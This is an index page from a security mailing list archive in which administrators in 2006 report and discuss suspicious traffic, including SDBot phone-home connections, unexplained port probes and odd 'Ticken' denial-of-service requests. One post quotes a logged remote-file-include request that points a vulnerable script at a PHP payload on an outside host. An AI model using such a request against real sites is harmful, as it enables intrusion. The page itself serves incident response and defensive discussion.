Incidents Mode:
(Page 10 of 170)  < Prev  5 6 7 8 9 10 11 12 13 14 15  Next >
RE: RE: Worm attack on our network this morning -- anyone else see this? 2006-12-13
David Gillett (gillettdavid fhda edu)
What I've got so far is that the 7654 IRC connection is
typical of the "SDBot" family of malware.

The number of infections has stabilized -- only one new
infected machine in the last three hours. That strongly
suggests that machines with up to date patches and/or
antivirus and/or non-blank pa

[ more ]  [ reply ]
http://thebesthack.altervista.org/input.txt 2006-12-13
modincidents mail securityfocus com (1 replies)

An incidents subscriber emailed me stating that they were getting the
following in there 404 logs:

PHP.asp</activate.php?language=conf&footerpage=http://thebesthack.alterv
ista.org/input.txt?

It appears that an attacker is attempting to exploit a remote file include
vulnerability. If the attack

[ more ]  [ reply ]
Re: http://thebesthack.altervista.org/input.txt 2006-12-14
Bojan Zdrnja (bojan zdrnja gmail com)
RE: Worm attack on our network this morning -- anyone else see this? 2006-12-13
David Gillett (gillettdavid fhda edu)
I neglected to mention that the "phone home" destinations
are all in the 86.x.x.x range.

Dave

> -----Original Message-----
> From: David Gillett [mailto:gillettdavid (at) fhda (dot) edu [email concealed]]
> Sent: Wednesday, December 13, 2006 1:05 PM
> To: 'incidents (at) securityfocus (dot) com [email concealed]'
> Subject: Worm attack on our networ

[ more ]  [ reply ]
Re: Re: New UDP port probed (36970) 2006-12-12
rpan hotmail com (1 replies)
is your host on DHCP? The IP could be used for B2B client in the past.

------------------------------------------------------------------------
------
This List Sponsored by: Black Hat

Attend the Black Hat Briefings & Training USA, July 29-August 3 in Las Vegas.
World renowned security experts rev

[ more ]  [ reply ]
Worm attack on our network this morning -- anyone else see this? 2006-12-13
David Gillett (gillettdavid fhda edu)
RE: New UDP port probed (36970) 2006-12-11
McGowan, Jeremy (jmcgowan globalspec com)
Ares, which is a P2P Program, most likely.

-Jeremy

-----Original Message-----
From: listbounce (at) securityfocus (dot) com [email concealed] [mailto:listbounce (at) securityfocus (dot) com [email concealed]]
On Behalf Of Tim
Sent: Saturday, December 09, 2006 9:51 PM
To: Walter C. Daugherity
Cc: incidents (at) securityfocus (dot) com [email concealed]
Subject: Re: New UDP port prob

[ more ]  [ reply ]
Re: Re: New UDP port probed (36970) 2006-12-11
w1ngz73 yahoo com
A quick google of 'UDP 36970' shows it to be a common outgoing port for remote client software. Incoming connections to this kind of port is probably some kind of probe for a specific client vulnerability.

------------------------------------------------------------------------
------
This List Spon

[ more ]  [ reply ]
Re: Re: New UDP port probed (36970) 2006-12-11
anonymous an as
That looks like it may be an RPC service. Try probing the boxes on 36970 (the ones htat probed you), and see what you get back.

------------------------------------------------------------------------
------
This List Sponsored by: Black Hat

Attend the Black Hat Briefings & Training USA, July 29-Au

[ more ]  [ reply ]
New UDP port probed (36970) 2006-12-08
Walter C. Daugherity (daugher cs tamu edu) (2 replies)
Today's log shows a new UDP port (36970) probed by

24.85.239.112
125.22.34.118
59.70.136.92
140.113.90.231

etc., and I did not find that port in various lists of ports used by viruses, Trojans, backdoors, etc.

Anybody know what this is?

--
Walter C. Daugherity

[ more ]  [ reply ]
Re: New UDP port probed (36970) 2006-12-11
killy (killfactory gmail com)
Re: New UDP port probed (36970) 2006-12-10
Tim (tim-forensics sentinelchicken org)
Re: Re: Thousands of attempts to port 35825 and 11090 2006-12-06
artsspamhere shaw ca
Thanks for the replies. Perhaps I failed to mention that this is a "personal" fw/router (a Netgear FR314P) so the full packet dumps etc. that you folks are looking for aren't there. About the only question I can answer is that it was 99% UDP. The source ports seemed to be all over the place (I di

[ more ]  [ reply ]
Re: Thousands of attempts to port 35825 and 11090 2006-12-05
bucklerk dsainc com
I couldn't find anything on these ports either. It's possible they're used by a trojan program.

First scan all your machines behind your router for these open ports. It's possible one of your machines has been infected with a trojan, "phoned home", and now the attacker is trying to gain access.
J

[ more ]  [ reply ]
Thousands of attempts to port 35825 and 11090 2006-12-04
artsspamhere shaw ca (2 replies)
I'm seeing continuous attempts to these two ports in my router's logs. Most of the source IP addresses I looked up are in China (I'm in Canada). What are they after?!

I have searched for hours for info on these two ports and come up empty. ie. seemingly no known exploits.

Thanks in advance,
Art

[ more ]  [ reply ]
Re: Thousands of attempts to port 35825 and 11090 2006-12-06
ilaiy (ilaiy e gmail com)
Re: Thousands of attempts to port 35825 and 11090 2006-12-05
Tim (tim-forensics sentinelchicken org)
Re: Re: "Ticken" web attacks? 2006-11-17
bucklerk dsinc com (2 replies)
Oops silly me. I thought it said Tickling.
It says Ticking.
That is odd.

------------------------------------------------------------------------
------
This List Sponsored by: Black Hat

Attend the Black Hat Briefings & Training USA, July 29-August 3 in Las Vegas.
World renowned security experts

[ more ]  [ reply ]
Re: Re: "Ticken" web attacks? 2006-11-20
K.M. Jeary (kmj1000 ucs cam ac uk) (2 replies)
Re: "Ticken" web attacks? 2006-11-20
Valdis Kletnieks vt edu
Re: "Ticken" web attacks? 2006-11-20
Radu Oprisan (radu securesystems ro)
Re: Re: "Ticken" web attacks? 2006-11-19
Dude VanWinkle (dudevanwinkle gmail com)
Re: "Ticken" web attacks? 2006-11-17
bucklerk dsainc com
Never seen that before myself.
Did a web search.
http://www.thefreedictionary.com/Ticken

Tick´en
n. 1. See Ticking.

So it looks like your machines were tickled to death. Someone has an interesting sense of humor.

------------------------------------------------------------------------
------
Thi

[ more ]  [ reply ]
spambot and dictionary attacks 2006-11-17
rowland onobrauche (rowland onobrauche legendplc com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I would like to hear from anyone that has successfully blocked
spambots or dictionary attacks without the need of another server in
between your mailserver and the senders.
The mailserver on my end is exim and it is actually a virtual server,
so i canno

[ more ]  [ reply ]
"Ticken" web attacks? 2006-11-16
Steve Friedl (steve unixwiz net) (1 replies)
Good evening, all,

A customer recently underwent a denial-of-service attack where the many
attacking machines submitted HTTP requests that consisted of nothing but

Ticken <%/%>%:|||:<&%%><<><?>

Plus the usual CR/LF + CR/LF.

Normally one would expect to find GET or POST or HEAD, followed by the

[ more ]  [ reply ]
RE: "Ticken" web attacks? 2006-11-22
James C. Slora Jr. (james slora phra com)
Re: \x HTTP requests 2006-11-09
Neil Dickey (neil geol niu edu)
"Maxime Ducharme" <mducharme (at) cybergeneration (dot) com [email concealed]> wrote:

>I see these HTTP request and I'm looking for more information :
>[ ... ]
>x.x.x.3 - - [08/Nov/2006:05:06:21 -0500] "\x80|\x01\x03\x01" 200 8 "-" "-"
>
>Would it be someone attempting to send https request on my port 80 ?

When I see things

[ more ]  [ reply ]
(Page 10 of 170)  < Prev  5 6 7 8 9 10 11 12 13 14 15  Next >


 

Privacy Statement
Copyright 2010, SecurityFocus